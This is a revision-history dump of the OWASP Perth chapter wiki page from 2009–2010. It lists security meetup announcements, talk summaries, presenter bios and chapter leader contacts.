* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== Web Application (In)Security Brief - Injection ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

'''Date: Thursday 30th of September, 2010'''
'''Time: 17:15 sign-in, 17:30 start'''
'''Location: Level 46, Bankwest Tower, 108 St Georges Tce, Perth, 6000'''
'''RSVP: [mailto:xntrik@gmail.com Christian Frichot]'''

== Previous OWASP Meetings ==

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2010-08-19T08:24:38Z

Xntrik: Update with Sep 2010 Meeting Details.

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== Web Application (In)Security Brief - Injection ===

Having recently run training sessions on web application security for SyScan'10 and Blackhat, we're lucky enough to have Wade Alcorn from NGS to give a brief presentation on "Exploiting and discovering injection" for September's Perth OWASP Meeting. Come on up to Level 46 of the Bankwest Tower to join us discuss web application security with Wade and others. Please RSVP to ensure appropriate seating arrangements and we're hoping to then shift off to the Generous Squire for a quick beverage afterwards!

==== About the presenter ====

Wade Alcorn has experience in numerous aspects of offensive information security assessments. This ranges from bluetooth, reverse engineering and web application assessments to managing large teams of security professionals. Prior to joining NGS, Wade had been responsible for cutting-edge PKI and VPN development using technologies including C/C++ and Java. He has presented at conferences including BlackHat and AusCERT.

'''Date: Thursday 16th of September, 2010'''
'''Time: 17:15 sign-in, 17:30 start'''
'''Location: Level 46, Bankwest Tower, 108 St Georges Tce, Perth, 6000'''
'''RSVP: [mailto:xntrik@gmail.com Christian Frichot]'''

== Previous OWASP Meetings ==

=== Security Event and Incident Management" Panel Session (Perth AISA August 2010) ===

==== [http://www.aisa.org.au/index.php?page=301 AISA Details] ====

Log management is a necessary task in Security Management, but is often neglected. There are various pressures being placed on businesses, such as audit and compliance, industry standards (eg PCI, APRA), internal security maturity which have allowed organisations to understand the benefits to be gained from undertaking a SEIM project.

There are many options for organisations looking to develop log management and security incident response processes, which range from open source syslog solutions, through to vendor supplied SEIM products and cloud based monitoring solutions.

A panel selected from a variety of industries including representation from security consulting, corporate and vendor will discuss the considerations, options and benefits of employing SEIM technology and processes.

We were fortunate to have Joshua Qwek, one of Perth's OWASP chapter lead, participate in this panel.

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2010-07-05T01:08:36Z

Xntrik: Updated previous presentations section.

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

Watch this space.

== Previous OWASP Meetings ==

=== How mature is your software security process? (Perth AISA May 2010) ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 18/11/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2010-06-01T09:43:00Z

Xntrik: adding speaker details.

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== How mature is your software security process? ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

==== Speaker ====

Christian Frichot is an active AISA member and OWASP member, currently employed by BankWest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting.

==== Details ====

'''Date: Wednesday, 9th of June 2010'''
'''Time: From 5:15pm)'''
'''Location: [http://www.ey.com/Global/assets.nsf/Australia/Location_Map_Perth/$file/Perth.pdf Ernst and Young, 11 Mounts Bay Road Perth WA 6000]'''
'''Registration: [mailto:Perth@aisa.org.au Perth AISA]'''

== Previous OWASP Meetings ==

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 18/11/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2010-06-01T09:40:56Z

Xntrik: Updated with June 2010 meeting with AISA details.

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

=== How mature is your software security process? ===

==== [http://www.aisa.org.au/index.php?page=287 AISA Details] ====

As the security industry continues to change its focus to application
security a lot of companies who rely on software, developed either
internally or externally, are wondering what they can do reduce the risk
of security flaws.

Microsoft's Security Development Lifecycle (SDL) model can look
appealing, however without a clear understanding of what your software
security processes look like, it may be difficult to achieve any real
improvements.

Implementing a holistic end-to-end software security process can often
look like an impossible task, and while the end picture resembles Eden,
it's often the first steps that everyone stumbles on. As the saying goes
"You can't manage what you can't measure", and without a clear
understanding of what your software security processes look like now it's
unlikely that you can achieve any real improvements.

OWASP's Open Software Assurance Maturity Model, or OpenSAMM, aims
to assist organisations, both big and small, in evaluating their existing
software security practices and constructing a measurable, balanced
program to increase their software security.

Wondering how this can help your internal development processes? Want
to have a more rigid process to audit your externally developed software
processes? Then perhaps OWASP's OpenSAMM project can assist.

This meeting will be co-hosted by both the local AISA chapter and the Perth OWASP chapter.

==== Details ====

'''Date: Wednesday, 9th of June 2010'''
'''Time: From 5:15pm)'''
'''Location: [http://www.ey.com/Global/assets.nsf/Australia/Location_Map_Perth/$file/Perth.pdf Ernst and Young, 11 Mounts Bay Road Perth WA 6000]'''
'''Registration: [mailto:Perth@aisa.org.au Perth AISA]'''

== Previous OWASP Meetings ==

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 18/11/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

Perth Australia

2010-04-12T02:24:00Z

Xntrik: Updated contact information for Christian Frichot

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [http://www.owasp.org/index.php/User:Xntrik Christian Frichot]
* [mailto:joshua@qwek.com Joshua Qwek]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

Watch this space!

== Previous OWASP Meetings ==

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 18/11/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

User:Xntrik

2010-04-12T02:21:09Z

Xntrik:

Christian Frichot

One of the [[Perth_Australia]] OWASP chapter leads.

To learn more about me you can check out http://un-excogitate.org or reach me on http://twitter.com/xntrik

User:Xntrik

2010-04-12T02:20:49Z

Xntrik:

Christian Frichot

One of the [[Perth_Australia]] OWASP chapter leads.

To learn more about me you can check out http://un-excogitate.org or reach me on twitter.com/xntrik

Perth Australia

2010-03-31T01:19:50Z

Xntrik: Removed Tim's email

{{Chapter Template|chaptername=Perth, Western Australia|extra=The chapter leaders are:
* [mailto:joshua@qwek.com Joshua Qwek]
* [mailto:xntrik@gmail.com Christian Frichot]
* Timothy Bessant
* [mailto:david.taylor@bankwest.com.au David Taylor]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Perth|emailarchives=http://lists.owasp.org/pipermail/owasp-Perth}}

<paypal>Perth Australia</paypal>

== Upcoming OWASP Events ==

Watch this space!

== Previous OWASP Meetings ==

=== Perth OWASP - Perth AISA Technical Day (Dec 2009) ===

==== [http://www.owasp.org/index.php/File:AISA_Perth_TSD_2009_Brochure_-Final.pdf Brochure] ====

The local OWASP boys will be whipping out their flux capacitor to fit as much information as they possibly can into a 2 hour jam-packed session on web app security testing. By providing a flyby of the OWASP Testing Guide, David and Christian aim to demonstrate and explain how to detect security vulnerabilities in your own web applications, including: Cross Site Scripting; Injection Flaws; Cross Site Request Forgery and Session Management Flaws.

Demonstrations will utilise a number of open source and freely available tools, including OWASP's own WebScarab. To provide a yoga-like flexibility to the session all materials and testing environments (an Ubuntu wrapped VMware virtual machine) will be provided to attendees, allowing you to either chase us rapidly down the rabbit hole of the OWASP Top 10, or to take your own time after the session...

The perfect way to spend a lazy Sunday afternoon.

=== Web-based Malware (Sep 2009) ===

==== About the presenter ====
Shlomi Cohen joined IBM with the Watchfire acquisition at August 2007.
Over nine years of experience in web application security in both start-ups and established companies. Emphasis in strategic selling, sales consulting, technical sales and management.
* Leading the Security solution on the WW Rational Tiger sales team
* Work with the customers and the local sales team to form the right security solution
* Development of sale process for multiple products
* Working closely with customers and the product management team in driving the products roadmaps
* Assisting IBM’s growth in acquisition portfolio

Previous to the WW Rational Security Solution leader:
* Managing the technical sales team for Watchfire in the Americas group of IBM
* Watchfire Security Research team manager - A team responsible for various web application security aspects including web application vulnerability research, security product rule updates, enhanced security feature definition, security audits, customer support, marketing and sales assistance
* AppShield Development Manager - Managed the development and QA teams for the AppShield product - a client Server Web Application Firewall

=== Threat Modelling in the Software Development Lifecycle (Feb 2009) ===

One of the most important concepts being promoted in the security industry is security in the software development lifecycle. This concept is important due to two primary factors:
* It is generally recognised that by shifting security activities closer towards the requirements gathering stage, or the design stage, that less vulnerabilities will make their way into the production systems.
* It is also recognised that the cost of mitigating vulnerabilities increases later in the lifecycle.
By walking through a case study I hope to demonstrate the effectiveness of addressing risk during the earlier stage of the software development lifecycle, and that these activities are not solely the responsibility of the "security guy", but all participants in a software project including the project manager, business stakeholders and software designer.
==== About the presenter ====
Christian Frichot is currently employed by Bankwest working within the Security Consulting Services team. His core responsibilities include phishing and online fraud response, security assessments, information risk assessments and other ad-hoc information security consulting. Christian hopes to spend more time in '09 focusing on education and application security, where he feels more effort needs to be applied.

-Updated 18/11/09 by [mailto:xntrik@gmail.com Christian Frichot]

[[Category:OWASP Chapter]]
[[Category:Australia]]

User:Xntrik

2010-03-30T05:18:52Z

Xntrik:

Christian Frichot

One of the [[Perth_Australia]] OWASP chapter leads.

To learn more about me you can check out http://un-excogitate.org

I've Been Hacked-What Now

2010-01-06T12:28:53Z

